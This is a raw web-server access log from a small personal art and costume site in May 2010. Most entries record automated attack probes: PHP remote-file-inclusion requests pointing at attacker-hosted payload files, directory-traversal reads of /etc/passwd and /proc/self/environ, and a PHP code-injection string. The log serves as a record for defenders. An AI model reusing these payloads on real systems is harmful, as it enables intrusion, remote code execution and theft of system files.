87.106.42.197 - - [01/May/2010:20:29:38 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
87.106.42.197 - - [01/May/2010:20:29:38 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.803"
87.106.42.197 - - [01/May/2010:20:29:38 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 200 3998 "-""libwww-perl/5.803"
207.46.204.191 - - [01/May/2010:20:30:25 -0500] "GET /logs/access_log.1247788800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.176.206 - - [01/May/2010:20:31:59 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.250.255.243 - - [01/May/2010:20:32:39 -0500] "GET /logs/access_log.1250208000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
164.77.228.200 - - [01/May/2010:20:33:29 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 200 3998 "-""libwww-perl/5.805"
164.77.228.200 - - [01/May/2010:20:33:29 -0500] "GET //?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.intoy1004.co.kr/bbs/README.txt? HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
216.129.119.43 - - [01/May/2010:20:35:53 -0500] "GET /logs/?M=A HTTP/1.1" 200 3993 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.195.229 - - [01/May/2010:20:38:54 -0500] "GET /logs/access_log.1231891200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.111.176.206 - - [01/May/2010:20:40:19 -0500] "GET /logs/access_log.1268956800//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
89.111.176.206 - - [01/May/2010:20:40:19 -0500] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 200 3998 "-""libwww-perl/5.805"
87.250.255.243 - - [01/May/2010:20:42:23 -0500] "GET /logs/access_log.1223596800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.177.33.14 - - [01/May/2010:20:42:56 -0500] "GET /logs//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:42:56 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:42:56 -0500] "GET //uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:43:25 -0500] "GET //uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:43:25 -0500] "GET /logs//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:43:25 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:44:18 -0500] "GET /logs//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:44:18 -0500] "GET //uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:44:18 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.195.224 - - [01/May/2010:20:44:55 -0500] "GET /logs/access_log.1169769600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.224 - - [01/May/2010:20:46:55 -0500] "GET /logs/access_log.1202515200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [01/May/2010:20:47:38 -0500] "GET /logs/access_log.1181520000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.177.33.14 - - [01/May/2010:20:47:40 -0500] "GET /logs//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:47:40 -0500] "GET //uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
81.177.33.14 - - [01/May/2010:20:47:40 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://jjang.oxwiz.co.kr/zboard//board/zero_vote/.cok/P1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
207.46.195.225 - - [01/May/2010:20:49:25 -0500] "GET /logs/access_log.1160438400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.145 - - [01/May/2010:20:49:25 -0500] "GET /logs/access_log.1168041600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.68.20.197 - - [01/May/2010:20:54:00 -0500] "GET /logs/access_log.1213833600/index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:20:54:01 -0500] "GET /index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:20:54:01 -0500] "GET /logs/index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
222.236.47.182 - - [01/May/2010:20:54:03 -0500] "GET /config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:03 -0500] "GET /logs/access_log.1264723200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:03 -0500] "GET /logs/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:03 -0500] "GET /logs/access_log.1266019200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:36 -0500] "GET /config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:36 -0500] "GET /logs/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:36 -0500] "GET /logs/access_log.1266019200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:54:48 -0500] "GET /logs/access_log.1264723200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
211.172.232.251 - - [01/May/2010:20:54:57 -0500] "GET /logs/access_log.1213833600/index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
211.172.232.251 - - [01/May/2010:20:54:58 -0500] "GET /index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
211.172.232.251 - - [01/May/2010:20:54:58 -0500] "GET /logs/index2.php?x=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
222.236.47.182 - - [01/May/2010:20:55:41 -0500] "GET /config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:55:41 -0500] "GET /logs/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:55:41 -0500] "GET /logs/access_log.1266019200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [01/May/2010:20:55:41 -0500] "GET /logs/access_log.1264723200/config.sef.php?mosConfig.absolute.path=http://konyaterapi.com//images/smilies/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:20:55:59 -0500] "GET /config.sef.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:20:56:04 -0500] "GET /logs/config.sef.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 303 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:20:56:04 -0500] "GET /logs/access_log.1266019200/config.sef.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
189.108.172.26 - - [01/May/2010:20:56:20 -0500] "GET /logs/access_log.1264723200/config.sef.php?mosConfig.absolute.path=http://e-regis.cmtc.ac.th/cvs/id1.txt??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:20:56:59 -0500] "GET /logs/access_log.1228435200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.106.42.197 - - [01/May/2010:20:58:32 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
87.106.42.197 - - [01/May/2010:20:58:32 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
87.106.42.197 - - [01/May/2010:20:58:33 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
87.106.42.197 - - [01/May/2010:20:58:44 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.803"
83.103.70.86 - - [01/May/2010:21:02:56 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
83.103.70.86 - - [01/May/2010:21:03:29 -0500] "GET /logs/access_log.1268611200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
83.103.70.86 - - [01/May/2010:21:03:29 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
83.103.70.86 - - [01/May/2010:21:03:30 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
113.52.152.45 - - [01/May/2010:21:03:53 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
194.150.236.81 - - [01/May/2010:21:08:46 -0500] "GET //admin/auth.php?xcart_dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:21:08:47 -0500] "GET /logs//admin/auth.php?xcart_dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:21:08:47 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
194.150.236.81 - - [01/May/2010:21:08:52 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
113.52.152.45 - - [01/May/2010:21:09:50 -0500] "GET /logs/access_log.1268611200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1"
113.52.152.45 - - [01/May/2010:21:09:50 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
113.52.152.45 - - [01/May/2010:21:09:51 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
83.103.70.86 - - [01/May/2010:21:11:27 -0500] "GET /logs/access_log.1268611200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
83.103.70.86 - - [01/May/2010:21:11:28 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
83.103.70.86 - - [01/May/2010:21:11:28 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
67.195.112.180 - - [01/May/2010:21:11:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.52.208.228 - - [01/May/2010:21:11:52 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
72.52.208.228 - - [01/May/2010:21:11:52 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
89.111.176.206 - - [01/May/2010:21:12:30 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
87.250.255.243 - - [01/May/2010:21:13:16 -0500] "GET /logs/access_log.1172793600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
113.52.152.45 - - [01/May/2010:21:15:18 -0500] "GET /logs/access_log.1268611200//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
113.52.152.45 - - [01/May/2010:21:15:19 -0500] "GET //index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1"
113.52.152.45 - - [01/May/2010:21:15:19 -0500] "GET /logs//index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.195.112.180 - - [01/May/2010:21:16:07 -0500] "GET /logs/access_log.1177286400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
123.125.68.83 - - [01/May/2010:21:17:36 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
87.250.255.243 - - [01/May/2010:21:24:37 -0500] "GET /logs/access_log.1258934400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
89.111.176.206 - - [01/May/2010:21:26:07 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
89.111.176.206 - - [01/May/2010:21:26:07 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.111.176.206 - - [01/May/2010:21:26:29 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
220.80.108.70 - - [01/May/2010:21:29:34 -0500] "GET //index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
69.116.49.24 - - [01/May/2010:21:30:56 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "http://www.ravensgard.org/gerekr/costume.html""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.116.49.24 - - [01/May/2010:21:30:56 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.116.49.24 - - [01/May/2010:21:30:56 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.116.49.24 - - [01/May/2010:21:30:56 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.116.49.24 - - [01/May/2010:21:30:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
69.116.49.24 - - [01/May/2010:21:30:59 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
115.68.20.197 - - [01/May/2010:21:35:26 -0500] "GET /logs/access_log.1270684800/playing.php/common/db.php?commonpath=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:21:35:27 -0500] "GET /playing.php/common/db.php?commonpath=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
115.68.20.197 - - [01/May/2010:21:35:28 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://alexsa.justfree.com/id-vnc.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
207.46.199.188 - - [01/May/2010:21:35:29 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.42 - - [01/May/2010:21:37:22 -0500] "GET /logs/access_log.1233619200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [01/May/2010:21:37:35 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
123.125.68.72 - - [01/May/2010:21:40:46 -0500] "GET /tattoo/links.htm HTTP/1.1" 200 1325 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
156.62.1.12 - - [01/May/2010:21:46:15 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
156.62.1.12 - - [01/May/2010:21:46:15 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
156.62.1.12 - - [01/May/2010:21:46:15 -0500] "GET /logs/access_log.1268611200/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
87.250.255.243 - - [01/May/2010:21:46:23 -0500] "GET /logs/access_log.1228003200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
156.62.1.12 - - [01/May/2010:21:46:52 -0500] "GET /logs/access_log.1268956800/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:51:27 -0500] "GET /logs/access_log.1264982400///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:51:27 -0500] "GET /logs///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3999 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:51:27 -0500] "GET ///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:51:47 -0500] "GET /logs/access_log.1262995200///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:24 -0500] "GET /logs/access_log.1264982400///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:25 -0500] "GET ///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:25 -0500] "GET /logs///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3999 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:25 -0500] "GET ///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:25 -0500] "GET /logs///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 200 3999 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:25 -0500] "GET /logs/access_log.1264982400///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:32 -0500] "GET /logs/access_log.1262995200///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.19.31.123 - - [01/May/2010:21:53:37 -0500] "GET /logs/access_log.1262995200///?ldpath=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/sculptures.htm HTTP/1.1" 200 3706 "http://www.bing.com/images/search?q=Fish+Art+Work&FORM=R5FD16""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/eagle.jpg HTTP/1.1" 200 13397 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/fishplatter1.png HTTP/1.1" 200 33135 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
68.101.157.129 - - [01/May/2010:21:54:56 -0500] "GET /artwork/metamorfish.jpg HTTP/1.1" 200 30815 "http://tomdolan.pconline.com/artwork/sculptures.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
